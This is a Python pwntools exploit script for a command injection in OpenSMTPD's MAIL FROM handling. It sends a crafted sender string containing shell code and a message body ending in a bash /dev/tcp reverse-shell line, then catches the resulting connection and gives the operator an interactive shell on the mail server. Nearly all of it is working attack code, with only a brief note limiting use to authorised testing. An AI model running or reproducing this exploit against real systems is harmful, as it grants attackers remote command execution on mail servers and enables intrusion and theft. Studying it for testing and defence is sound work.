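#!/usr/bin/python3
"""Reverse-shell exploit for an OpenSMTPD MAIL FROM command injection.

The sender address sent in MAIL FROM carries a shell snippet.  On a
vulnerable target that snippet runs when the message is delivered to the
local recipient: its `read` loop discards the first lines of the message
the delivery agent receives on stdin (presumably the headers — the exact
count depends on the target), then `bash` reads the rest of stdin as a
script.  The message body is therefore a run of `#` comment lines (slack
for bash) followed by the reverse-shell line.

Usage:
    python3 exploit.py <target_host> <target_port> <rev_host> <rev_port> <recipient_email>

rev_host must be an address this machine can bind; the listener is opened
before the message is submitted because delivery can start as soon as the
final "." is acknowledged.  Use only against systems you are authorised to test.
"""
from pwn import *
import sys

# Injected sender, kept byte-for-byte: the loop list has 15 tokens, so the
# shell discards 15 lines of stdin before handing over to bash.  The string
# only uses characters the target accepted in the original run; changing
# it is likely to trip the MAIL FROM check ("250" expected).
# NOTE(review): the trailing `exit 0` presumably keeps the delivery agent
# from reporting a failure -- not verified here.
SENDER = b"<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>"

# Number of `#` lines placed before the shell command; matches the 15 reads
# in SENDER so bash sees only comments (or nothing) before the payload.
PAD_LINES = 15

# Seconds to wait on each SMTP reply before giving up instead of hanging.
SMTP_TIMEOUT = 10


def parse_args(argv) -> tuple:
    """Return (target_host, target_port, rev_host, rev_port, email) from argv.

    Prints the usage line and exits with status 1 when an argument is missing
    or a port is not an integer.
    """
    try:
        return argv[1], int(argv[2]), argv[3], int(argv[4]), argv[5]
    except (IndexError, ValueError):
        log.failure(
            "Usage: python3 exploit.py <target_host> <target_port> "
            "<rev_host> <rev_port> <recipient_email>"
        )
        sys.exit(1)


def build_body(rev_host: str, rev_port: int) -> bytes:
    """Return the DATA section: padding, reverse-shell line, end-of-data marker.

    Layout is "\\n" + PAD_LINES x "#\\n" + command + "\\n.\\n"; the leading
    blank line ends the (empty) header block so everything after it is body.
    """
    shell = f"bash -c 'bash -i >& /dev/tcp/{rev_host}/{rev_port} 0>&1'"
    return ("\n" + "#\n" * PAD_LINES + shell + "\n.\n").encode()


def smtp_step(r, p, line: bytes, expect: str = None, err: str = None) -> str:
    """Send one SMTP command and return the reply line.

    When `expect` is given and the reply does not contain it, log `err`,
    close the connection and exit with status 1.
    """
    r.sendline(line)
    res = r.recvline().decode(errors="replace").strip()
    p.status(res)
    if expect is not None and expect not in res:
        log.failure(err)
        r.close()
        sys.exit(1)
    return res


def main() -> None:
    """Check the banner, inject the payload, then hand the caught shell to the operator."""
    target_host, target_port, rev_host, rev_port, email = parse_args(sys.argv)

    # Bind first: a bind failure (port busy, non-local rev_host) should abort
    # before any traffic reaches the target, and the callback must not race
    # an unbound listener once the message is accepted.
    l = listen(rev_port, bindaddr=rev_host)

    r = remote(target_host, target_port, timeout=SMTP_TIMEOUT)
    banner = r.recvline().decode(errors="replace")
    if "OpenSMTPD" not in banner:
        log.failure("Target port is not running OpenSMTPD!")
        r.close()
        return
    log.success("Target port is running OpenSMTPD")

    p = log.progress(f"Sending love letter to {email}")
    smtp_step(r, p, b"HELO lol.com")
    # A patched server rejects the injected sender, hence the "not vulnerable" verdict.
    smtp_step(r, p, b"MAIL FROM:" + SENDER, "250", "Target not vulnerable!")
    smtp_step(r, p, f"RCPT TO:<{email}>".encode(), "250",
              "Recipient email address is invalid!")
    # 354 is the go-ahead for the message body.
    smtp_step(r, p, b"DATA", "354", "Server did not accept DATA!")

    r.send(build_body(rev_host, rev_port))
    # Wait for the queue acknowledgement so we know the message was accepted
    # before blocking on the listener.
    res = r.recvline().decode(errors="replace").strip()
    p.status(res)
    if "250" not in res:
        log.failure("Message was not accepted by the server!")
        r.close()
        return
    p.success("Done")
    r.close()

    l.wait_for_connection()
    l.interactive()


if __name__ == "__main__":
    main()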